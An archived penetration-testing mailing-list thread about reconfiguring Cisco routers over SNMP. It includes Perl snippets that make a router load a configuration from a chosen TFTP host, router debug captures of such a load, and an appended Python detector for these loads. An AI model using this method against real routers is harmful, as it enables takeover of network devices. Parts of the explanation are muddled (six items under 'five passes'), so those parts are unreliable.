Penetration Testing mailing list archives
[PEN-TEST] Fwd: Re: Attacking Cisco using SNMP
From: "Teicher, Mark" <mark.teicher () NETWORKICE COM>
Date: Tue, 28 Nov 2000 19:49:08 +0100
Oops.. Forgot this tidbit of information:

The SNMP_set command loads the MIB definitions contained in file. The MIB file is usually located at the file system position defined by the file argument.

There are five passes involved when processing a Set request:

1. Each variable in the variable binding list of the received PDU is checked to guarantee that each object is accessible and/or creatable, and writable.
2. The test method for each object is called to verify the object's instance, size/range, and value.
3. The variable binding list is parsed to construct a list of simultaneous Set operations for groups of objects.
4. This pass verifies that all required objects within a group have specified or default values.
5. It also ensures that all required values meet the relational constraints specified in the MIB.
6. Sets are then performed on all of the individual objects that can be reversed in case something goes wrong.

There are limitations on what the values for 'pathName' would be. This is the only required command line argument by the User. The 'pathName' is a file name with directory path. For instance, if the file contains passwords, the read and write actions will act as the file to update the passwords for the routers. Likewise, if the file contains ACLs, the router will update itself for security enforcement.

Date: Tue, 28 Nov 2000 19:46:41 +0100
To: Penetration Testers <PEN-TEST () securityfocus com>, PEN-TEST () securityfocus com
From: mark.teicher () networkice com
Subject: Re: Attacking Cisco using SNMP
Cc: "Matthew.Brown () predictive com" <Matthew.Brown () predictive com>, joseph.knape () predictive com

Never quite could get it to work correctly.. But anyways, here are some code snippets and packet captures to help you out.. You have to remember some of us know very little about SNMP_set and how it can be utilized to manage large enterprise networks. (biting tongue -:)

# Write $request to the handle named wh10<nr>, then read the reply from rh20<nr>.
sub snmp_raw_set {
    local($nr,$request) = @_;
    local($w1,$r2,$resp,@ret,@info);
    $w1 = "wh10" . $nr;
    $r2 = "rh20" . $nr;
    print $w1 ">$request\n";
    # The next line is unneeded, if uncommented will cause wrong error code to be
    # generated.
    # $resp = <$r2>;
    print $w1 "?\n";
    $resp = <$r2>; # should give return code
    if (isError($resp)) { return 0; };
    return substr($resp,2);
}
1;

*Mar 1 03:41:54.875 PST: TFTP: Sending read request
*Mar 1 03:41:54.879 PST: UDP: sent src=192.168.55.121(6608), dst=192.168.55.188 (69), length=60
*Mar 1 03:41:54.879 PST: IP: s=192.168.55.121 (local), d=192.168.55.188 (Ethernet0), len 60, sending
*Mar 1 03:42:01.543 PST: IP ARP: rcvd req src 192.168.55.188 0800.20b6.07c5, dst 192.168.55.120 Ethernet0
*Mar 1 03:42:01.567 PST: IP ARP: rcvd req src 192.168.55.188 0800.20b6.07c5, dst 192.168.55.120 Ethernet0
*Mar 1 03:42:01.891 PST: SNMP: Response, reqid 2, errstat 5, erridx 1
 lsystem.53.192.168.55.188 = /cisco/ironlung-config
*Mar 1 03:42:01.919 PST: SNMP: Packet sent via UDP to 192.168.55.188
*Mar 1 03:42:01.923 PST: UDP: sent src=192.168.55.121(161), dst=192.168.55.188(33345), length=96
*Mar 1 03:42:01.927 PST: IP: s=192.168.55.121 (local), d=192.168.55.188 (Ethernet0), len 96, sending
*Mar 1 03:42:01.935 PST: IP: s=192.168.55.188 (Ethernet0), d=192.168.55.121 (Ethernet0), len 112, rcvd 3
*Mar 1 03:42:01.939 PST: ICMP: dst (192.168.55.121) port unreachable rcv from 192.168.55.188
*Mar 1 03:42:01.943 PST: SNMP: Packet received via UDP from 192.168.55.188 on Ethernet0
*Mar 1 03:42:01.951 PST: SNMP: Set request, reqid 2, errstat 0, erridx 0
 lsystem.53.192.168.55.188 = /cisco/ironlung-configg
*Mar 1 03:42:01.971 PST: %SYS-4-SNMP_HOSTCONFIGSET: SNMP hostConfigSet request. Loading configuration from 192.168.55.188.
*Mar 1 03:42:01.999 PST: SNMP: Queuing packet to 192.168.55.188
*Mar 1 03:42:01.999 PST: SNMP: V1 Trap, ent ciscoConfigManMIB.2, addr 192.168.55.121, gentrap 6, spectrap 1
 ccmHistoryEventEntry.3.58 = 2
 ccmHistoryEventEntry.4.58 = 6
 ccmHistoryEventEntry.5.58 = 3

Cisco Internetwork Operating System Software
IOS (tm) 2500 Software (C2500-IS56-L), Version 11.2(8), RELEASE SOFTWARE (fc1)
Copyright (c) 1986-1997 by cisco Systems, Inc.
Compiled Tue 05-Aug-97 09:07 by ckralik
Image text-base: 0x00001448, data-base: 0x00561104

ROM: System Bootstrap, Version 4.14(9.1), SOFTWARE

ironlung uptime is 2 weeks, 13 hours, 19 minutes
System restarted by power-on
System image file is "c2500-is56-l.112-8.Z", booted via flash
Host configuration file is "/cisco/ironlung-confg", booted via tftp from 192.168.55.188

cisco 2500 (68030) processor (revision D) with 16384K/2048K bytes of memory.
Processor board ID 01560898, with hardware revision 00000000
Bridging software.

Snmpset is an SNMP application that uses the SET Request to set information on a network entity. One or more fully qualified object identifiers must be given as arguments on the command line. A type and a value to set must accompany each object identifier. Each variable name is given in the format specified in variables. If the network entity has an error processing the request packet, an error packet will be returned and a message will be shown, helping to pinpoint in what way the request was malformed. If there were other variables in the request, the request will be resent without the bad variable.

# Depending on $ConfFlag, set hostConfigSet (load $pathName from $tftpHost)
# and/or writeMem on the router $initHost.
sub confActions {
    my($tftpHost, $pathName, $initHost, $comm) = @_;
    postMessages("confActions($tftpHost, $pathName, $initHost, $comm)", $LOGDBG);
    if ($tftpHost eq $initHost) {
        postMessages(">>>> tftpHost = router: $initHost <<<<",$LOGERR);
        return;
    }
    if (!openSNMP($initHost, $comm)) {
        postMessages("$initHost\:", $LOGDBS);
        if ($ConfFlag == $ConfRead || $ConfFlag == $ConfLoad) {
            $v = "hostConfigSet\[$tftpHost\]=\"$pathName\"";
            $results = &snmp_set($COMMPORT, $v);
            postMessages("\tsnmp_set($COMMPORT, $v)=$results", $LOGDBS);
        }
        if ($ConfFlag == $ConfWrite || $ConfFlag == $ConfLoad) {
            $v = "writeMem=1";
            $results = &snmp_set($COMMPORT, $v);
            postMessages("\tsnmp_set($COMMPORT, $v)=$results", $LOGDBS);
        }
        closeSNMP();
    }
    postMessages("confActions exits", $LOGDBG);
}

At 08:37 AM 11/29/00 +0800, David Taylor wrote:

On Tue, 28 Nov 2000, Fabio Pietrosanti (naif) wrote:
> [snip]
> Has someone ever used snmpset to upload and/or download configuration
> file from a cisco ios 12 with new system mib ?

Fabio,

I haven't had a need to do this (yet), but the Cisco v2 MIBS include quite a bit of in-line documentation on how this would be done. See the URL below for the relevant MIB...

ftp://ftp.cisco.com/pub/mibs/v2/CISCO-CONFIG-COPY-MIB.my

Regards,
Dave Taylor
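
A detection-side reading of the router capture above, as an added example that is not part of the original post: it walks IOS debug/syslog lines, picks out SNMP Set requests on lsystem.53 (shown as hostConfigSet in the post's code), and marks whether the %SYS-4-SNMP_HOSTCONFIGSET message confirmed the load. The log lines are copied from the capture; the function names, the `managers` and `tftp_servers` allowlists, and the address 192.168.55.10 are assumptions made for illustration.

```python
import re

# Lines copied from the router capture in the post (varbind on its own line).
SAMPLE_LOG = """\
*Mar 1 03:42:01.891 PST: SNMP: Response, reqid 2, errstat 5, erridx 1
 lsystem.53.192.168.55.188 = /cisco/ironlung-config
*Mar 1 03:42:01.943 PST: SNMP: Packet received via UDP from 192.168.55.188 on Ethernet0
*Mar 1 03:42:01.951 PST: SNMP: Set request, reqid 2, errstat 0, erridx 0
 lsystem.53.192.168.55.188 = /cisco/ironlung-configg
*Mar 1 03:42:01.971 PST: %SYS-4-SNMP_HOSTCONFIGSET: SNMP hostConfigSet request. Loading configuration from 192.168.55.188.
"""

IP = r"(\d{1,3}(?:\.\d{1,3}){3})"
RX_FROM = re.compile(r"SNMP: Packet received via UDP from " + IP)
RX_PDU = re.compile(r"SNMP: (Set request|Response|Get request|V1 Trap)")
RX_BIND = re.compile(r"lsystem\.53\." + IP + r" = (\S+)")
RX_LOAD = re.compile(r"%SYS-4-SNMP_HOSTCONFIGSET: .*Loading configuration from " + IP)


def find_config_loads(log_text, managers, tftp_servers):
    """Return one finding per SNMP Set request on lsystem.53.<tftp-ip>."""
    findings, sender, pdu = [], None, None
    for line in log_text.splitlines():
        if m := RX_FROM.search(line):
            sender = m.group(1)       # source of the most recent SNMP packet
        if m := RX_PDU.search(line):
            pdu = m.group(1)          # varbinds that follow belong to this PDU
        if (m := RX_BIND.search(line)) and pdu == "Set request":
            findings.append({
                "sender": sender, "tftp": m.group(1), "path": m.group(2),
                "loaded": False,
                "sender_ok": sender in managers,
                "tftp_ok": m.group(1) in tftp_servers,
            })
        if (m := RX_LOAD.search(line)) and findings:
            # Syslog confirmation that the router started the TFTP load.
            if findings[-1]["tftp"] == m.group(1):
                findings[-1]["loaded"] = True
    return findings


def alerts(findings):
    """Keep sets from an unapproved sender or naming an unapproved TFTP host."""
    return [f for f in findings if not (f["sender_ok"] and f["tftp_ok"])]
```

The varbind echoed in the Response PDU (errstat 5) is skipped on purpose, so only the request that the router actually acted on produces a finding.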